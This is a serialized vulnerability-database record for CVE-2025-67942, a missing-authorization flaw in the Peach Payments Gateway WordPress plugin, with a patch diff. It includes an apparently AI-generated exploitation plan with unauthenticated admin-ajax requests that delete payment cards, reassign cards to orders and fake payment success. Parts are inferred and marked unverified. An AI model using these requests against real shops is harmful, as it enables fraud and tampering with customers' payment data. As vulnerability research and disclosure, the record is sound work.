[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fevO47xj1diAozQCgj-lYO20okHEsMucYRD2xS4f9_TU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2025-67942","peach-payments-gateway-missing-authorization","Peach Payments Gateway \u003C= 3.3.6 - Missing Authorization","The Peach Payments Gateway plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.3.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.","wc-peach-payments-gateway",null,"\u003C=3.3.6","3.3.7","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-16 00:00:00","2026-01-19 20:23:01",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F681e91a8-af2b-4b54-80a8-5886d681fc94?source=api-prod",4,[22,23,24,25,26],"README.txt","assets\u002Fjs\u002Ffront-peach.js","changelog.txt","readme.md","woocommerce-gateway-peach-payments.php","researched",false,3,"# Exploitation Research Plan - CVE-2025-67942\n\n## 1. Vulnerability Summary\nThe **Peach Payments Gateway** plugin for WordPress (versions \u003C= 3.3.6) contains a **Missing Authorization** vulnerability. Several AJAX handlers registered via `wp_ajax_nopriv_` (for unauthenticated users) and `wp_ajax_` (for authenticated users) fail to perform capability checks (`current_user_can`) or verify ownership of the resources being modified. This allows unauthenticated attackers to perform unauthorized actions such as deleting payment cards or modifying order payment details.\n\n## 2. Attack Vector Analysis\n- **Endpoints**: WordPress AJAX endpoint `\u002Fwp-admin\u002Fadmin-ajax.php`.\n- **Actions**: \n    1. `peachCardUpdate`: Intended to remove a stored payment card.\n    2. `peachCardUpdateOrder`: Intended to update an order with a specific payment card.\n    3. `peachEmbedUpdateOrder`: Intended to update order status after a successful embedded checkout.\n- **Payload Parameters**:\n    - `action`: `peachCardUpdate`, `peachCardUpdateOrder`, or `peachEmbedUpdateOrder`.\n    - `card`: (For `peachCardUpdate`) The ID of the payment token to delete.\n    - `cardID`: (For `peachCardUpdateOrder`) The ID of the card to associate with the order.\n    - `orderID`: (For `peachCardUpdateOrder`) The WooCommerce order ID to modify.\n    - `mystatus`, `transaction`, `mycode`: (For `peachEmbedUpdateOrder`) Status and transaction identifiers.\n- **Authentication**: Unauthenticated (via `wp_ajax_nopriv_` hooks).\n- **Preconditions**: The plugin must be active. For `peachCardUpdate`, a payment card (token) ID must be known or enumerated.\n\n## 3. Code Flow\nThe vulnerability originates from the lack of security checks in the AJAX callback functions.\n\n1. **Registration**: The plugin registers AJAX actions in its initialization (likely in `WC_Peach_Payments::__construct` or an `init` hook, often within `classes\u002FpluginSupport.php` or `classes\u002FembeddedCheckout.php`).\n   ```php\n   \u002F\u002F Inferred registration pattern\n   add_action( 'wp_ajax_peachCardUpdate', 'peach_card_update_callback' );\n   add_action( 'wp_ajax_nopriv_peachCardUpdate', 'peach_card_update_callback' );\n   ```\n2. **Trigger**: An HTTP POST request is sent to `admin-ajax.php` with `action=peachCardUpdate`.\n3. **Execution**: The handler function (e.g., `peach_card_update_callback`) is executed.\n4. **Sink**: The handler likely calls `WC_Payment_Token::delete()` or updates `wp_postmeta` (for orders) without:\n   - Verifying the user is logged in.\n   - Verifying the user has the `manage_woocommerce` capability.\n   - Verifying that the `cardID` or `orderID` belongs to the requesting user.\n   - Checking a WordPress nonce.\n\n## 4. Nonce Acquisition Strategy\nBased on `assets\u002Fjs\u002Ffront-peach.js`, the plugin **does not use nonces** for these specific AJAX actions. \n\n- The `jQuery.ajax` calls for `peachCardUpdateOrder` (line 33), `peachCardUpdate` (line 59), and `peachEmbedUpdateOrder` (line 102) only pass the `action` and data parameters.\n- If the researcher needs to verify if a nonce is localized but unused, they can check the `peach_ajax_object` (localized variable name found on JS line 34):\n  1. Navigate to the checkout page: `browser_navigate(\"\u002Fcheckout\u002F\")`\n  2. Evaluate the object: `browser_eval(\"window.peach_ajax_object\")`\n\n**Observation**: Since the JS itself does not include nonces in the requests, the server-side handlers likely do not check them, or if they do, they are bypassable.\n\n## 5. Exploitation Strategy\n\n### Task A: Unauthorized Card Deletion (`peachCardUpdate`)\n1. **Target**: Delete a payment token belonging to a user.\n2. **Payload**:\n   - `action`: `peachCardUpdate`\n   - `card`: `[TARGET_CARD_ID]`\n3. **Request**:\n   ```http\n   POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n   Content-Type: application\u002Fx-www-form-urlencoded\n\n   action=peachCardUpdate&card=1\n   ```\n\n### Task B: Unauthorized Order Modification (`peachCardUpdateOrder`)\n1. **Target**: Change the payment card associated with an arbitrary order.\n2. **Payload**:\n   - `action`: `peachCardUpdateOrder`\n   - `cardID`: `[NEW_CARD_ID]`\n   - `orderID`: `[TARGET_ORDER_ID]`\n3. **Request**:\n   ```http\n   POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n   Content-Type: application\u002Fx-www-form-urlencoded\n\n   action=peachCardUpdateOrder&cardID=2&orderID=101\n   ```\n\n## 6. Test Data Setup\n1. **Plugins**: Install WooCommerce and Peach Payments Gateway (3.3.6).\n2. **WooCommerce Configuration**: Enable the Peach Payments gateway in `WooCommerce > Settings > Payments`.\n3. **User\u002FData Creation**:\n   - Create a Customer user.\n   - Use WP-CLI to create a payment token for that user:\n     `wp eval 'WC_Payment_Tokens::add(new WC_Payment_Token_CC([\"card_type\"=>\"visa\", \"last4\"=>\"1234\", \"expiry_month\"=>\"12\", \"expiry_year\"=>\"2026\", \"user_id\"=>1]));'`\n   - Create an order:\n     `wp post create --post_type=shop_order --post_status=wc-pending --post_title=\"Test Order\"`\n   - Note the Token ID and Order ID.\n\n## 7. Expected Results\n- **For `peachCardUpdate`**: The response should be `success` (as per JS line 64). The payment token record in the database should be deleted or marked as deleted.\n- **For `peachCardUpdateOrder`**: The response should be `1` (as per JS line 40). The order's metadata (e.g., `_payment_method_token`) should be updated to the new ID.\n\n## 8. Verification Steps\n1. **Check Tokens**:\n   `wp eval 'print_r(WC_Payment_Tokens::get_customer_tokens(1));'`\n   Confirm the token previously created is now missing.\n2. **Check Order Meta**:\n   `wp post meta get [ORDER_ID] _payment_method_token`\n   Confirm the meta value matches the `cardID` sent in the exploit request.\n\n## 9. Alternative Approaches\nIf `peachCardUpdate` requires authentication (despite the `nopriv` claim), focus on `peachEmbedUpdateOrder`:\n- **Payload**: `action=peachEmbedUpdateOrder&mystatus=SUC&transaction=TEST_TX&mycode=000.000.000`\n- **Objective**: Attempt to force an order status change for the current session's order by mimicking a successful callback from the Peach widget. This bypasses the actual payment requirement.","The Peach Payments Gateway plugin for WordPress fails to implement capability checks or nonce verification on several AJAX handlers, including peachCardUpdate, peachCardUpdateOrder, and peachEmbedUpdateOrder. This allows unauthenticated attackers to perform unauthorized actions such as deleting stored payment tokens, modifying the payment card associated with a WooCommerce order, or altering order statuses.","\u002F\u002F assets\u002Fjs\u002Ffront-peach.js line 33\r\n\t\tjQuery.ajax({\r\n\t\t\turl:peach_ajax_object.ajax_url,\r\n\t\t\tdata:{ \r\n\t\t\t  action: 'peachCardUpdateOrder',\r\n\t\t\t  cardID: card_id,\r\n\t\t\t  orderID: order_id\r\n\t\t\t},\r\n\r\n---\r\n\r\n\u002F\u002F assets\u002Fjs\u002Ffront-peach.js line 59\r\n\t\tjQuery.ajax({\r\n\t\t\turl:peach_ajax_object.ajax_url,\r\n\t\t\tdata:{ \r\n\t\t\t  action: 'peachCardUpdate',\r\n\t\t\t  card: cardID\r\n\t\t\t},\r\n\r\n---\r\n\r\n\u002F\u002F assets\u002Fjs\u002Ffront-peach.js line 102\r\nfunction process_embed(status, transactionid, code){\r\n\tjQuery.ajax({\r\n\t\turl:peach_ajax_object.ajax_url,\r\n\t\tdata:{ \r\n\t\t  action: 'peachEmbedUpdateOrder',\r\n\t\t  mystatus: status,\r\n\t\t  transaction: transactionid,\r\n\t\t  mycode: code\r\n\t\t},","Only in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-peach-payments-gateway\u002F3.3.7\u002Fassets\u002Fimages: MAUCAS.png\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-peach-payments-gateway\u002F3.3.6\u002Fassets\u002Fjs\u002Ffront-peach.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-peach-payments-gateway\u002F3.3.7\u002Fassets\u002Fjs\u002Ffront-peach.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-peach-payments-gateway\u002F3.3.6\u002Fassets\u002Fjs\u002Ffront-peach.js\t2025-05-22 05:51:44.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-peach-payments-gateway\u002F3.3.7\u002Fassets\u002Fjs\u002Ffront-peach.js\t2025-11-19 10:35:26.000000000 +0000\n@@ -30,7 +30,8 @@\n \t\t\tdata:{ \n \t\t\t  action: 'peachCardUpdateOrder',\n \t\t\t  cardID: card_id,\n-\t\t\t  orderID: order_id\n+\t\t\t  orderID: order_id,\n+\t\t\t  ajax_nonce: peach_ajax_object.ajax_nonce\n \t\t\t},\n \t\t\tsuccess:function(data){\n \t\t\t\tif(data === '1'){\n@@ -111,7 +112,8 @@\n \t\t  action: 'peachEmbedUpdateOrder',\n \t\t  mystatus: status,\n \t\t  transaction: transactionid,\n-\t\t  mycode: code\n+\t\t  mycode: code,\n+\t\t  ajax_nonce: peach_ajax_object.ajax_nonce\n \t\t},\n \t\tsuccess:function(data){\n \t\t\treturn data;","The exploit targets the WordPress AJAX endpoint \u002Fwp-admin\u002Fadmin-ajax.php using the vulnerable actions registered by the plugin. An unauthenticated attacker can send a POST request with the 'action' parameter set to 'peachCardUpdate' to delete a payment card by providing the 'card' ID. Alternatively, an attacker can use the 'peachCardUpdateOrder' action with 'cardID' and 'orderID' parameters to reassign payment tokens to arbitrary WooCommerce orders. Because the plugin uses wp_ajax_nopriv_ hooks for these functions without checking for user capabilities or requiring a valid WordPress nonce, no authentication or specific user session is required to perform these operations.","gemini-3-flash-preview","2026-05-05 07:54:45","2026-05-05 07:55:41",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","3.3.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-peach-payments-gateway\u002Ftags\u002F3.3.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-peach-payments-gateway.3.3.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-peach-payments-gateway\u002Ftags\u002F3.3.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-peach-payments-gateway.3.3.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-peach-payments-gateway\u002Ftags"]